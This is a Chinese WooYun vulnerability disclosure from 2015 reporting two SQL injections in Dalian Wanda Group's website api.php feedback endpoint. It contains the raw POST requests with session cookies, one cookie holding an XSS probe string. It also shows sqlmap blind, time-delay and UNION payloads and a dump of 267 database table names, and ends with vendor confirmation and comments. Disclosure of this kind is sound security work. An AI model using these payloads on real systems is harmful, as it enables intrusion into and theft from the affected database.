当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132136

漏洞标题:大连万达集团股份有限公司官方网站两枚POST型SQL注入打包

相关厂商:大连万达集团股份有限公司

漏洞作者: 百度流氓

提交时间:2015-08-06 16:13

修复时间:2015-09-20 16:48

公开时间:2015-09-20 16:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-06: 细节已通知厂商并且等待厂商处理中
2015-08-06: 厂商已经确认,细节仅向厂商公开
2015-08-16: 细节向核心白帽子及相关领域专家公开
2015-08-26: 细节向普通白帽子公开
2015-09-05: 细节向实习白帽子公开
2015-09-20: 细节向公众公开

简要描述:

大连万达集团股份有限公司官方网站两枚POST型SQL注入打包

详细说明:

包1:

POST /api.php?op=feedback HTTP/1.1
Content-Length: 93
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.wanda.cn/
Cookie: WANDACNSESSID=8rurvpb9rhelnotj6kvh6e1ad1; HMVT=cd44f738169a36ff869eee3ca6afb9b1|1438496238|; HMACCOUNT=2C9F94FD6DF138AC; Hm_lvt_cd44f738169a36ff869eee3ca6afb9b1=1438496681,1438496688,1438496718,1438496738; Hm_lpvt_cd44f738169a36ff869eee3ca6afb9b1=1438496738; __utmt=1; __utma=41079204.802376289.1438495914.1438495914.1438495914.1; __utmb=41079204.1.10.1438495914; __utmc=41079204; __utmz=41079204.1438495914.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); BAIDUID=BF1A957F41EF89BAFA6A6BE08083EEC2:FG=1; CNZZDATA5891341=cnzz_eid%3D136358418-1438494730-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1438494730
Host: www.wanda.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
City=1169&DictionaryID=LY&type=GetProJectList


包2:

POST /api.php?op=feedback HTTP/1.1
Content-Length: 68
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.wanda.cn/
Cookie: WANDACNSESSID=8rurvpb9rhelnotj6kvh6e1ad1; HMVT=cd44f738169a36ff869eee3ca6afb9b1|1438496238|; HMACCOUNT=2C9F94FD6DF138AC; Hm_lvt_cd44f738169a36ff869eee3ca6afb9b1=1438496681,1438496688,1438496718,1438496738; Hm_lpvt_cd44f738169a36ff869eee3ca6afb9b1=1438496738; __utmt=1; __utma=41079204.802376289.1438495914.1438495914.1438495914.1; __utmb=41079204.1.10.1438495914; __utmc=41079204; __utmz=41079204.1438495914.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); BAIDUID=BF1A957F41EF89BAFA6A6BE08083EEC2:FG=1; CNZZDATA5891341=cnzz_eid%3D136358418-1438494730-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1438494730
Host: www.wanda.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Province=fWqPza1t&type=getCity

漏洞证明:

1.

QQ截图20150806150248.jpg


2.

QQ截图20150806150616.jpg


截图太麻烦我直接上日志
1.

sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:
---
Parameter: DictionaryID (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: City=1169&DictionaryID=LY' AND 3158=3158 AND 'hNyR'='hNyR&type=GetProJectList
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: City=1169&DictionaryID=LY';WAITFOR DELAY '0:0:5'--&type=GetProJectList
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: City=1169&DictionaryID=LY' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(108)+CHAR(76)+CHAR(108)+CHAR(120)+CHAR(85)+CHAR(66)+CHAR(106)+CHAR(68)+CHAR(70)+CHAR(119)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113),NULL-- &type=GetProJectList
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: Microsoft SQL Server 2008
current user:    'ksfw_user'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: DictionaryID (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: City=1169&DictionaryID=LY' AND 3158=3158 AND 'hNyR'='hNyR&type=GetProJectList
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: City=1169&DictionaryID=LY';WAITFOR DELAY '0:0:5'--&type=GetProJectList
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: City=1169&DictionaryID=LY' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(108)+CHAR(76)+CHAR(108)+CHAR(120)+CHAR(85)+CHAR(66)+CHAR(106)+CHAR(68)+CHAR(70)+CHAR(119)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113),NULL-- &type=GetProJectList
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: Microsoft SQL Server 2008
current database:    'ksfw'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: DictionaryID (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: City=1169&DictionaryID=LY' AND 3158=3158 AND 'hNyR'='hNyR&type=GetProJectList
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: City=1169&DictionaryID=LY';WAITFOR DELAY '0:0:5'--&type=GetProJectList
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: City=1169&DictionaryID=LY' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(108)+CHAR(76)+CHAR(108)+CHAR(120)+CHAR(85)+CHAR(66)+CHAR(106)+CHAR(68)+CHAR(70)+CHAR(119)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113),NULL-- &type=GetProJectList
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: Microsoft SQL Server 2008
Database: ksfw
[267 tables]
+---------------------------------+
| AL_ADD_APPLY                    |
| AL_AUDIT_LOG                    |
| AL_CATE                         |
| AL_CONTENT                      |
| AL_CONTENT_CATE                 |
| AL_CONT_DETAIL                  |
| AU_ACCREDIT_DATA                |
| AU_ACCREDIT_FUNC                |
| AU_ACCREDIT_MENU                |
| CONT_HANDEL_LOG                 |
| CUS_ASSIGN_LOG                  |
| CUS_BL                          |
| CUS_BLACKLIST                   |
| CUS_BL_APPLY                    |
| CUS_BL_CONTACT                  |
| CUS_BL_INTERVAL                 |
| CUS_BL_LOG                      |
| CUS_BL_PHONE                    |
| CUS_CONTACT                     |
| CUS_CONT_INFO                   |
| CUS_CONT_TYPE                   |
| CUS_DOM                         |
| CUS_HOBBY                       |
| CUS_INFO                        |
| CUS_OR_CONTACT                  |
| CUS_QU_CONTACT                  |
| CUS_RECOMMEND                   |
| CUS_SPEC_EVENT                  |
| ComplaintPlazaView              |
| EHR_EMPLOYEE_ORG_REL_TEMP       |
| EHR_EMPLOYEE_POS_REL_TEMP       |
| EHR_EMPLOYEE_TEMP               |
| EHR_ORGNIZATION_TEMP            |
| EHR_POSITION_TEMP               |
| EMPLOYEE_ORG_REL                |
| FAC_TS_ATTR_DETAIL              |
| FAC_TS_ATTR_DETAIL_POEP         |
| FAC_TS_CONT_DETAIL              |
| FAC_TS_DEAL_TIME_DETAIL         |
| FAC_TS_KM_COUNT_DAY             |
| FAC_TS_OPER_DETAIL              |
| FAC_TS_QD_COUNT_DAY             |
| FAC_TS_YJ_DETAIL                |
| FAC_TS_ZDY_ATTR_DETAIL          |
| FAC_ZJ_CONTACT_HZ_VIEW          |
| FAC_ZJ_CONTACT_INFO_VIEW        |
| HW_CTICONFIG                    |
| HW_DUTYMANAGE                   |
| HW_DUTY_EMP                     |
| HW_SEATACCREDIT                 |
| HW_SKILLGROUP                   |
| HW_SKILLSEAT                    |
| HW_SKILL_SEAT                   |
| IMS_BASIC_REPLY                 |
| IM_NEWS                         |
| IM_NEWS_REAL_RECEIVER           |
| IM_NEWS_RECEIVER                |
| IVR_CITY_YETAI                  |
| IVR_MOBILE_TELEPHONE_MAPPING    |
| IVR_OFFLINE_TO_MOBILE           |
| IVR_TELEPHONE_AREA_MAPPING      |
| IVR_VIP_EMP                     |
| JBPM4_DEPLOYMENT                |
| JBPM4_DEPLOYPROP                |
| JBPM4_EXECUTION                 |
| JBPM4_HIST_ACTINST              |
| JBPM4_HIST_DETAIL               |
| JBPM4_HIST_PROCINST             |
| JBPM4_HIST_TASK                 |
| JBPM4_HIST_VAR                  |
| JBPM4_ID_GROUP                  |
| JBPM4_ID_MEMBERSHIP             |
| JBPM4_ID_USER                   |
| JBPM4_JOB                       |
| JBPM4_LOB                       |
| JBPM4_PARTICIPATION             |
| JBPM4_PROPERTY                  |
| JBPM4_SWIMLANE                  |
| JBPM4_TASK                      |
| JBPM4_VARIABLE                  |
| KM_BASEINFO                     |
| KM_CATE                         |
| KM_EVAL                         |
| KM_INFO_REL                     |
| KN_SUBJECT_CATE                 |
| KN_SUBJECT_ITEM                 |
| KN_SURVEY                       |
| KN_SURVEY_ANSWER                |
| KN_SURVEY_R_SUBJECT             |
| KN_SURVEY_SUBJECT               |
| OAMQMessages                    |
| OB_ACTIV_BASE                   |
| OB_ACTIV_OPELOG                 |
| OB_ACTIV_RULE                   |
| OB_ASSIGN_ROLE                  |
| OB_ASSIGN_SET                   |
| OB_CONTACT_ITEM                 |
| OB_CONTACT_SET                  |
| OB_CUS_ATTRI                    |
| OB_CUS_TEMPL                    |
| OB_PERMIT_TIME                  |
| OB_PROJ_BASE                    |
| OB_PROJ_OPELOG                  |
| OB_STAGE_BASE                   |
| OB_STAGE_ITEM                   |
| ONLINE_CONTACT                  |
| ONLINE_CONTACT_READ_LOG         |
| ONLINE_CONTACT_RECEIVER         |
| OP_CT_COLLECT                   |
| OP_CT_NOTICE                    |
| OP_CT_NOTICE_READ_LOG           |
| OP_CT_NOTICE_RECEIVER           |
| ORGNIZATION                     |
| QD_WHITE_LIST                   |
| REC_SYN_SMS                     |
| REL_SPLIT_TYPE                  |
| RP_CMS_SKILL_HOUR               |
| SHEET                           |
| SHEET_BACK                      |
| SHEET_CONSULT                   |
| SHEET_REMINDER                  |
| SHEET_REPAIRS                   |
| SHEET_TS                        |
| SHEET_VOID                      |
| SYS_ATTACHMENT                  |
| SYS_BP_ITEM                     |
| SYS_BP_TYPE                     |
| SYS_CONTACT_ADDR                |
| SYS_DEPARTMENT                  |
| SYS_DIC                         |
| SYS_DIC_ITEM                    |
| SYS_EMP                         |
| SYS_EMPLOYEE                    |
| SYS_GROUP                       |
| SYS_HANDLE_LOG                  |
| SYS_HOLIDAY                     |
| SYS_LOG_OPERATE                 |
| SYS_MENU                        |
| SYS_MENU_NAV                    |
| SYS_OPRITION_LOG                |
| SYS_ORG_ROLE                    |
| SYS_PASSWORD_POLICY             |
| SYS_REGION                      |
| SYS_RESOURCE                    |
| SYS_ROLE                        |
| SYS_ROLE_CATE                   |
| SYS_ROLE_EMP                    |
| SYS_ROLE_GROUP                  |
| SYS_ROLE_MENU                   |
| SYS_ROLE_PARAM                  |
| SYS_ROLE_USER                   |
| SYS_SP_ITEM                     |
| SYS_SP_TYPE                     |
| SYS_TENEMENT                    |
| SYS_TENEMENT_DOC                |
| SYS_USER                        |
| SYS_USER_GROUP                  |
| SYS_USER_LOGIN_LOG              |
| SYS_WORKTIME                    |
| TOOL_NOTE                       |
| TSM_Messages                    |
| Temp_Organizations              |
| WC_ACCOUNT                      |
| WC_FANS                         |
| WC_FANS_GROUP                   |
| WC_ISSUE                        |
| WC_MATERIAL_API                 |
| WC_MATERIAL_PICTURE             |
| WC_MATERIAL_VOICE               |
| WC_MEMBER                       |
| WC_MEMBER_GROUP                 |
| WC_MENU                         |
| WC_MSG_SEND                     |
| WC_REPLY_RULE                   |
| WC_REPLY_TEXT                   |
| WC_REPLY_VIDEO                  |
| WC_RULE_KEYWORD                 |
| WC_RULE_REPLY                   |
| WC_USER_BINDING                 |
| WD_MASS_HANDLE                  |
| WD_MASS_INCIDENT                |
| WD_MASS_TASK                    |
| WD_ORDERHANDLE                  |
| WD_SG                           |
| WD_TS_SHEET                     |
| WD_WEBORDER                     |
| WD_YQJK                         |
| WFE_APPROVE_LOG                 |
| WFE_BEFORE_LOG                  |
| WFE_HANDLE_APPLY                |
| WFE_REMINDER_LOG                |
| WFE_SHEET                       |
| WFE_SHIFT_LOG                   |
| WFE_TODO                        |
| WFE_TODO_ASSIGNMENT             |
| WFE_UPGRADE_LOG                 |
| WFE_URGE                        |
| WF_AR_NOTICE_LOG                |
| WF_AR_NOTICE_LOG_20150420before |
| WF_AR_NOTICE_LOG_CURR_temp      |
| WF_AR_NOTICE_LOG_temp           |
| WF_AR_RE_LOG                    |
| WF_Add_DATA                     |
| WF_FLOW_CATE                    |
| WF_FLOW_INFO                    |
| WF_FLOW_VARIABLE                |
| WF_NODE                         |
| WF_NODE_ALERT                   |
| WF_NODE_ALTER_REG               |
| WF_NODE_CONDITION               |
| WF_NODE_EXEC_REG                |
| WF_NODE_NOTICE                  |
| WF_NODE_ROLE                    |
| WF_NODE_TIME                    |
| WF_SHEEP_ASSOCIATED             |
| WF_SHEET_ASSOCIATED             |
| WSQ_BUILDING                    |
| WSQ_COMMUNITY                   |
| WSQ_FAN_CUS                     |
| WSQ_ROOM                        |
| WSQ_UNIT                        |
| Wanda_RT_CONTRACT               |
| ZJ_BATCH_BASE                   |
| ZJ_BATCH_CONTACT                |
| ZJ_BATCH_DF                     |
| ZJ_BATCH_RULE                   |
| ZJ_BATCH_SF                     |
| ZJ_BATCH_SHEET                  |
| ZJ_CONT_ITEM                    |
| ZJ_CONT_ITEM_KPI                |
| ZJ_CONT_ITEM_KPI_PUBLISH        |
| ZJ_CONT_ITEM_PUBLISH            |
| ZJ_EVAL_BASE                    |
| ZJ_EVAL_CHECK                   |
| ZJ_EVAL_ITEM                    |
| ZJ_EVAL_S_BASE                  |
| ZJ_EVAL_S_RULE                  |
| ZJ_EXAMRULE_CONT                |
| ZJ_EXAM_RULE                    |
| ZJ_PROJ_BASE                    |
| ZJ_PROJ_ROLE                    |
| ZJ_REF                          |
| ZJ_REF_CONT                     |
| ZJ_REF_DEPT                     |
| ZJ_REVIEW                       |
| ZJ_TEMPL                        |
| ZJ_TEMPL_BASE                   |
| ZJ_TEMPL_ITEM                   |
| ZJ_TEMPL_ITEM_KPI               |
| ZJ_TEMPL_KPI                    |
| ZJ_TEMPL_PUBLISH                |
| ZJ_TEMP_CONT                    |
| ZJ_TEMP_CONT_PUBLISH            |
| ZJ_THRES                        |
| ZJ_THRES_BASE                   |
| ZJ_THRES_RULE                   |
| ZJ_ZJDF_JZITEM_LOG              |
| ZJ_ZJRW                         |
| ZJ_ZJRW_ASSIGN_LOG              |
| ZJ_ZJRW_ROLE                    |
| ZJ_test1                        |
| rec_syn_cms                     |
| unEmpForRole                    |
| unEmpInfoForRole                |
| wsq_commu_cus                   |
| wsq_zutuan                      |
| 查询                            |
+---------------------------------+


2.

sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:
---
Parameter: Province (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Province=fWqPza1t';WAITFOR DELAY '0:0:5'--&type=getCity
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: Province=fWqPza1t' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(110)+CHAR(89)+CHAR(83)+CHAR(65)+CHAR(83)+CHAR(106)+CHAR(86)+CHAR(112)+CHAR(66)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113),NULL-- &type=getCity
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: Microsoft SQL Server 2008
current user:    'ksfw_user'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Province (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Province=fWqPza1t';WAITFOR DELAY '0:0:5'--&type=getCity
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: Province=fWqPza1t' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(110)+CHAR(89)+CHAR(83)+CHAR(65)+CHAR(83)+CHAR(106)+CHAR(86)+CHAR(112)+CHAR(66)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113),NULL-- &type=getCity
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: Microsoft SQL Server 2008
current database:    'ksfw'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Province (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Province=fWqPza1t';WAITFOR DELAY '0:0:5'--&type=getCity
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: Province=fWqPza1t' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(110)+CHAR(89)+CHAR(83)+CHAR(65)+CHAR(83)+CHAR(106)+CHAR(86)+CHAR(112)+CHAR(66)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113),NULL-- &type=getCity
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: Microsoft SQL Server 2008
Database: ksfw
[267 tables]
+---------------------------------+
| AL_ADD_APPLY                    |
| AL_AUDIT_LOG                    |
| AL_CATE                         |
| AL_CONTENT                      |
| AL_CONTENT_CATE                 |
| AL_CONT_DETAIL                  |
| AU_ACCREDIT_DATA                |
| AU_ACCREDIT_FUNC                |
| AU_ACCREDIT_MENU                |
| CONT_HANDEL_LOG                 |
| CUS_ASSIGN_LOG                  |
| CUS_BL                          |
| CUS_BLACKLIST                   |
| CUS_BL_APPLY                    |
| CUS_BL_CONTACT                  |
| CUS_BL_INTERVAL                 |
| CUS_BL_LOG                      |
| CUS_BL_PHONE                    |
| CUS_CONTACT                     |
| CUS_CONT_INFO                   |
| CUS_CONT_TYPE                   |
| CUS_DOM                         |
| CUS_HOBBY                       |
| CUS_INFO                        |
| CUS_OR_CONTACT                  |
| CUS_QU_CONTACT                  |
| CUS_RECOMMEND                   |
| CUS_SPEC_EVENT                  |
| ComplaintPlazaView              |
| EHR_EMPLOYEE_ORG_REL_TEMP       |
| EHR_EMPLOYEE_POS_REL_TEMP       |
| EHR_EMPLOYEE_TEMP               |
| EHR_ORGNIZATION_TEMP            |
| EHR_POSITION_TEMP               |
| EMPLOYEE_ORG_REL                |
| FAC_TS_ATTR_DETAIL              |
| FAC_TS_ATTR_DETAIL_POEP         |
| FAC_TS_CONT_DETAIL              |
| FAC_TS_DEAL_TIME_DETAIL         |
| FAC_TS_KM_COUNT_DAY             |
| FAC_TS_OPER_DETAIL              |
| FAC_TS_QD_COUNT_DAY             |
| FAC_TS_YJ_DETAIL                |
| FAC_TS_ZDY_ATTR_DETAIL          |
| FAC_ZJ_CONTACT_HZ_VIEW          |
| FAC_ZJ_CONTACT_INFO_VIEW        |
| HW_CTICONFIG                    |
| HW_DUTYMANAGE                   |
| HW_DUTY_EMP                     |
| HW_SEATACCREDIT                 |
| HW_SKILLGROUP                   |
| HW_SKILLSEAT                    |
| HW_SKILL_SEAT                   |
| IMS_BASIC_REPLY                 |
| IM_NEWS                         |
| IM_NEWS_REAL_RECEIVER           |
| IM_NEWS_RECEIVER                |
| IVR_CITY_YETAI                  |
| IVR_MOBILE_TELEPHONE_MAPPING    |
| IVR_OFFLINE_TO_MOBILE           |
| IVR_TELEPHONE_AREA_MAPPING      |
| IVR_VIP_EMP                     |
| JBPM4_DEPLOYMENT                |
| JBPM4_DEPLOYPROP                |
| JBPM4_EXECUTION                 |
| JBPM4_HIST_ACTINST              |
| JBPM4_HIST_DETAIL               |
| JBPM4_HIST_PROCINST             |
| JBPM4_HIST_TASK                 |
| JBPM4_HIST_VAR                  |
| JBPM4_ID_GROUP                  |
| JBPM4_ID_MEMBERSHIP             |
| JBPM4_ID_USER                   |
| JBPM4_JOB                       |
| JBPM4_LOB                       |
| JBPM4_PARTICIPATION             |
| JBPM4_PROPERTY                  |
| JBPM4_SWIMLANE                  |
| JBPM4_TASK                      |
| JBPM4_VARIABLE                  |
| KM_BASEINFO                     |
| KM_CATE                         |
| KM_EVAL                         |
| KM_INFO_REL                     |
| KN_SUBJECT_CATE                 |
| KN_SUBJECT_ITEM                 |
| KN_SURVEY                       |
| KN_SURVEY_ANSWER                |
| KN_SURVEY_R_SUBJECT             |
| KN_SURVEY_SUBJECT               |
| OAMQMessages                    |
| OB_ACTIV_BASE                   |
| OB_ACTIV_OPELOG                 |
| OB_ACTIV_RULE                   |
| OB_ASSIGN_ROLE                  |
| OB_ASSIGN_SET                   |
| OB_CONTACT_ITEM                 |
| OB_CONTACT_SET                  |
| OB_CUS_ATTRI                    |
| OB_CUS_TEMPL                    |
| OB_PERMIT_TIME                  |
| OB_PROJ_BASE                    |
| OB_PROJ_OPELOG                  |
| OB_STAGE_BASE                   |
| OB_STAGE_ITEM                   |
| ONLINE_CONTACT                  |
| ONLINE_CONTACT_READ_LOG         |
| ONLINE_CONTACT_RECEIVER         |
| OP_CT_COLLECT                   |
| OP_CT_NOTICE                    |
| OP_CT_NOTICE_READ_LOG           |
| OP_CT_NOTICE_RECEIVER           |
| ORGNIZATION                     |
| QD_WHITE_LIST                   |
| REC_SYN_SMS                     |
| REL_SPLIT_TYPE                  |
| RP_CMS_SKILL_HOUR               |
| SHEET                           |
| SHEET_BACK                      |
| SHEET_CONSULT                   |
| SHEET_REMINDER                  |
| SHEET_REPAIRS                   |
| SHEET_TS                        |
| SHEET_VOID                      |
| SYS_ATTACHMENT                  |
| SYS_BP_ITEM                     |
| SYS_BP_TYPE                     |
| SYS_CONTACT_ADDR                |
| SYS_DEPARTMENT                  |
| SYS_DIC                         |
| SYS_DIC_ITEM                    |
| SYS_EMP                         |
| SYS_EMPLOYEE                    |
| SYS_GROUP                       |
| SYS_HANDLE_LOG                  |
| SYS_HOLIDAY                     |
| SYS_LOG_OPERATE                 |
| SYS_MENU                        |
| SYS_MENU_NAV                    |
| SYS_OPRITION_LOG                |
| SYS_ORG_ROLE                    |
| SYS_PASSWORD_POLICY             |
| SYS_REGION                      |
| SYS_RESOURCE                    |
| SYS_ROLE                        |
| SYS_ROLE_CATE                   |
| SYS_ROLE_EMP                    |
| SYS_ROLE_GROUP                  |
| SYS_ROLE_MENU                   |
| SYS_ROLE_PARAM                  |
| SYS_ROLE_USER                   |
| SYS_SP_ITEM                     |
| SYS_SP_TYPE                     |
| SYS_TENEMENT                    |
| SYS_TENEMENT_DOC                |
| SYS_USER                        |
| SYS_USER_GROUP                  |
| SYS_USER_LOGIN_LOG              |
| SYS_WORKTIME                    |
| TOOL_NOTE                       |
| TSM_Messages                    |
| Temp_Organizations              |
| WC_ACCOUNT                      |
| WC_FANS                         |
| WC_FANS_GROUP                   |
| WC_ISSUE                        |
| WC_MATERIAL_API                 |
| WC_MATERIAL_PICTURE             |
| WC_MATERIAL_VOICE               |
| WC_MEMBER                       |
| WC_MEMBER_GROUP                 |
| WC_MENU                         |
| WC_MSG_SEND                     |
| WC_REPLY_RULE                   |
| WC_REPLY_TEXT                   |
| WC_REPLY_VIDEO                  |
| WC_RULE_KEYWORD                 |
| WC_RULE_REPLY                   |
| WC_USER_BINDING                 |
| WD_MASS_HANDLE                  |
| WD_MASS_INCIDENT                |
| WD_MASS_TASK                    |
| WD_ORDERHANDLE                  |
| WD_SG                           |
| WD_TS_SHEET                     |
| WD_WEBORDER                     |
| WD_YQJK                         |
| WFE_APPROVE_LOG                 |
| WFE_BEFORE_LOG                  |
| WFE_HANDLE_APPLY                |
| WFE_REMINDER_LOG                |
| WFE_SHEET                       |
| WFE_SHIFT_LOG                   |
| WFE_TODO                        |
| WFE_TODO_ASSIGNMENT             |
| WFE_UPGRADE_LOG                 |
| WFE_URGE                        |
| WF_AR_NOTICE_LOG                |
| WF_AR_NOTICE_LOG_20150420before |
| WF_AR_NOTICE_LOG_CURR_temp      |
| WF_AR_NOTICE_LOG_temp           |
| WF_AR_RE_LOG                    |
| WF_Add_DATA                     |
| WF_FLOW_CATE                    |
| WF_FLOW_INFO                    |
| WF_FLOW_VARIABLE                |
| WF_NODE                         |
| WF_NODE_ALERT                   |
| WF_NODE_ALTER_REG               |
| WF_NODE_CONDITION               |
| WF_NODE_EXEC_REG                |
| WF_NODE_NOTICE                  |
| WF_NODE_ROLE                    |
| WF_NODE_TIME                    |
| WF_SHEEP_ASSOCIATED             |
| WF_SHEET_ASSOCIATED             |
| WSQ_BUILDING                    |
| WSQ_COMMUNITY                   |
| WSQ_FAN_CUS                     |
| WSQ_ROOM                        |
| WSQ_UNIT                        |
| Wanda_RT_CONTRACT               |
| ZJ_BATCH_BASE                   |
| ZJ_BATCH_CONTACT                |
| ZJ_BATCH_DF                     |
| ZJ_BATCH_RULE                   |
| ZJ_BATCH_SF                     |
| ZJ_BATCH_SHEET                  |
| ZJ_CONT_ITEM                    |
| ZJ_CONT_ITEM_KPI                |
| ZJ_CONT_ITEM_KPI_PUBLISH        |
| ZJ_CONT_ITEM_PUBLISH            |
| ZJ_EVAL_BASE                    |
| ZJ_EVAL_CHECK                   |
| ZJ_EVAL_ITEM                    |
| ZJ_EVAL_S_BASE                  |
| ZJ_EVAL_S_RULE                  |
| ZJ_EXAMRULE_CONT                |
| ZJ_EXAM_RULE                    |
| ZJ_PROJ_BASE                    |
| ZJ_PROJ_ROLE                    |
| ZJ_REF                          |
| ZJ_REF_CONT                     |
| ZJ_REF_DEPT                     |
| ZJ_REVIEW                       |
| ZJ_TEMPL                        |
| ZJ_TEMPL_BASE                   |
| ZJ_TEMPL_ITEM                   |
| ZJ_TEMPL_ITEM_KPI               |
| ZJ_TEMPL_KPI                    |
| ZJ_TEMPL_PUBLISH                |
| ZJ_TEMP_CONT                    |
| ZJ_TEMP_CONT_PUBLISH            |
| ZJ_THRES                        |
| ZJ_THRES_BASE                   |
| ZJ_THRES_RULE                   |
| ZJ_ZJDF_JZITEM_LOG              |
| ZJ_ZJRW                         |
| ZJ_ZJRW_ASSIGN_LOG              |
| ZJ_ZJRW_ROLE                    |
| ZJ_test1                        |
| rec_syn_cms                     |
| unEmpForRole                    |
| unEmpInfoForRole                |
| wsq_commu_cus                   |
| wsq_zutuan                      |
| 查询                            |
+---------------------------------+


下边的下边就不操作了,日志一目了然。

修复方案:

一个api.php3个注入,我也是醉了。
大神在万达,你们比我懂.........

版权声明:转载请注明来源 百度流氓@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-06 16:47

厂商回复:

感谢百度流氓同学的持续关注与贡献!马上通知业务整改!

最新状态:

暂无

漏洞评价:

评论

  1. 2015-08-06 16:37 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    @百度流氓 又找了两枚啊 昨天一枚

  2. 2015-08-06 16:40 | 百度流氓 ( 路人 | Rank:28 漏洞数:4 | 老衲法号:乱来)

    @牛 小 帅 嗯,万达厂商真心不错所以在万达下点功夫。

  3. 2015-08-06 16:41 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    @百度流氓 速度好快 嘎嘎

  4. 2015-08-06 17:10 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    厂商拿了最佳靠谱的厂商,看这样子 是要发礼品卡的节奏 @万达

  5. 2015-08-06 17:15 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    @zeracker 我的芒果显示已送礼物给我 可是他连我联系方式都好像没

  6. 2015-08-06 17:19 | 百度流氓 ( 路人 | Rank:28 漏洞数:4 | 老衲法号:乱来)

    @牛 小 帅 。。。。。

  7. 2015-08-06 17:21 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    @百度流氓 我错了 i am sorry